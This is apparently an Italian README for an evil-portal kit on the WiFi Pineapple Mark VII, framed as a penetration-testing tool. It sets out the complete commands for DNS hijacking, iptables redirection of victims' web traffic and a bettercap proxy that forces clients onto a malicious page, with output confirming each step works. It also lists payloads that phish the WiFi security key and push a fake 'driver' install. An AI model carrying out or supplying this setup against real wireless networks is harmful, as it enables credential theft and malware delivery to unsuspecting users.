
Kit di access point fraudolento per test di penetrazione WiFi, che distribuisce payload di phishing tramite evil portal per catturare credenziali ed eseguire attacchi di ingegneria sociale sulle reti wireless.
Autore:: TW-D
Versione:: 1.0.0
Copyright:: Copyright (c) 2024 TW-D
Licenza:: Distribuito sotto gli stessi termini di Ruby
Richiede:: PHP >= 8.1, Ruby >= 2.7.0p0 e WiFi Pineapple Mark VII 2.1.3-stable
Installazione (Distribuzioni Linux basate su Debian)::
sudo apt-get install php8.1-cli php8.1-curl
sudo apt-get install build-essential ruby ruby-dev libpcap-dev
sudo gem install sorted_set bettercap
Un portale malevolo è una tecnica utilizzata per ingannare gli utenti di una rete Wi-Fi reindirizzandoli verso una pagina web malevola invece della prevista pagina di autenticazione o home page.
Nota : "Issues" e "Pull Requests" sono benvenuti.
| Sistema Operativo con/senza Browser Web | Tipo di Notifica |
|---|---|
| Ubuntu 22.04 | Nessuna |
| Android 8.0.0 | Sistema |
| Microsoft Windows 10 | Nessuna |
| Raspberry Pi bookworm | Nessuna |
| Ubuntu 22.04 con Mozilla Firefox | Avviso |
| Microsoft Windows 10 con Mozilla Firefox | Avviso |
| Raspberry Pi bookworm con Mozilla Firefox | Avviso |
Collega il WiFi Pineapple al computer tramite il cavo USB-C.
Impostazioni > Rete > Modalità Client Wireless : L'interfaccia wlan2 deve essere disconnessa.
hacker@hacker-computer:~$ ifconfig enx
enx: [...]
inet 172.16.42.100 netmask 255.255.255.0 broadcast 172.16.42.255
[...]
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp closed mdns
53/udp open domain
5353/udp closed zeroconf
[...]
hacker@hacker-computer:~$ ssh [email protected]
root@mk7:~# dnsmasq --address=/#/172.16.42.1 --no-hosts --interface=br-lan --port=5353 --no-resolv
root@mk7:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto udp --dport 53 --jump DNAT --table nat --to-destination 172.16.42.1:5353
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 80 --jump DNAT --table nat --to-destination 172.16.42.100:8080
root@mk7:~# iptables --append PREROUTING --in-interface br-lan --proto tcp --dport 443 --jump DNAT --table nat --to-destination 172.16.42.100:8000
root@mk7:~# iptables --append POSTROUTING --jump MASQUERADE --table nat
root@mk7:~# exit
(optional)
hacker@hacker-computer:~$ sudo nmap -sT -sU -p 53,5353 -e enx 172.16.42.1
[...]
PORT STATE SERVICE
53/tcp open domain
5353/tcp open mdns
53/udp open domain
5353/udp open zeroconf
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 53 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
(optional)
hacker@hacker-computer:~$ dig @172.16.42.1 -p 5353 www.google.com
[...]
;; ANSWER SECTION:
www.google.com. 0 IN A 172.16.42.1
[...]
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ php -S 172.16.42.100:8000
hacker@hacker-computer:~$ cd ./WiFi-Pineapple-MK7_Evil-Portal/
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv4/ip_forward"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo "${BASH}" -c "echo 0 > /proc/sys/net/ipv6/conf/all/forwarding"
hacker@hacker-computer:~/.../WiFi-Pineapple-MK7_Evil-Portal$ sudo bettercap \
--interface enx \
--gateway 172.16.42.1 \
--no-discovery \
--log ./logs/bettercap.log \
--silent \
--no-spoofing \
--proxy \
--proxy-port 8080 \
--allow-local-connections \
--no-sslstrip \
--no-http-logs \
--proxy-module ./EvilPortal.rb \
--redirect-url http://172.16.42.100:8000/
hacker@hacker-computer:~$ curl --head --interface enx "http://neverssl.com/"
HTTP/1.1 302 Found
[...]
Location: http://172.16.42.100:8000/
Cache-Control: max-age=0, private, must-revalidate
hacker@hacker-computer:~$ curl --head --insecure --interface enx "https://www.google.com/"
curl: (35) error:0A000126:SSL routines::unexpected eof while reading
hacker@hacker-computer:~$ exit
Nella directory "./payloads/" troverai :
| SVILUPPO | Autore | Descrizione | Come usare |
|---|---|---|---|
| skeleton.html | TW-D | Payload vuoto destinato allo sviluppo. | Documentazione |
| ESECUZIONE | Autore | Descrizione | Come usare |
|---|---|---|---|
| web-camera.html | TW-D | Simula un video di sorveglianza falso e richiede l'installazione di un driver per il suo funzionamento. | Documentazione |

| PHISHING | Autore | Descrizione | Come usare |
|---|---|---|---|
| wifi_security-key.html | TW-D | Simula un falso aggiornamento dell'apparecchiatura Internet e richiede la chiave di sicurezza WiFi per continuare. | Documentazione |
